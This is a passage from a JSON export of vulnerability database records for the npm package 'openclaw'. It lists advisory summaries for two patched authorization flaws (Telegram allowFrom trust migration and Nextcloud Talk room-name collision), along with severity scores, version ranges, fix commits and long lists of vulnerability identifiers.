kcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13"}],"aliases":["GHSA-63f5-hhc7-cx6p"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3qbe-dsde-p7dz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90102?format=json","vulnerability_id":"VCID-3wsw-d4z2-dydt","summary":"OpenClaw: Telegram legacy allowFrom migration fans default-account trust into all named accounts\n## Summary\nTelegram legacy allowFrom migration fans default-account trust into all named accounts\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 Telegram migration fans legacy default-account allowFrom trust into named accounts, which is an in-scope auth-boundary bug and low fits.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `d8c68c8d4265ea6fa5e8c5e056534c351bddef37` — 2026-03-31T12:51:38+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d8c68c8d4265ea6fa5e8c5e056534c351bddef37","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d8c68c8d4265ea6fa5e8c5e056534c351bddef37"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f693-58pc-2gfr","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f693-58pc-2gfr"},{"reference_url":"https://github.com/advisories/GHSA-f693-58pc-2gfr","reference_id":"GHSA-f693-58pc-2gfr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f693-58pc-2gfr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-f693-58pc-2gfr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3wsw-d4z2-dydt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91662?format=json","vulnerability_id":"VCID-3xeb-phgc-vkcg","summary":"OpenClaw: Nextcloud Talk room allowlist matched colliding room names instead of stable room tokens\n## Summary\nNextcloud Talk room authorization matched on collidable room names instead of the stable room token, allowing policy confusion across similarly named rooms.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/nextcloud-talk/src/inbound.ts now resolves allowlist policy from roomToken-backed room identity.\n- extensions/nextcloud-talk/src/policy.ts now keys room authorization on stable room tokens instead of display names.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35624","reference_id":"","reference_type":"","scores":[{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21321","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21369","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21384","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35624"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35624","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35624"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk"},{"reference_url":"https://github.com/advisories/GHSA-xhq5-45pm-2gjr","reference_id":"GHSA-xhq5-45pm-2gjr","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xhq5-45pm-2gjr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VC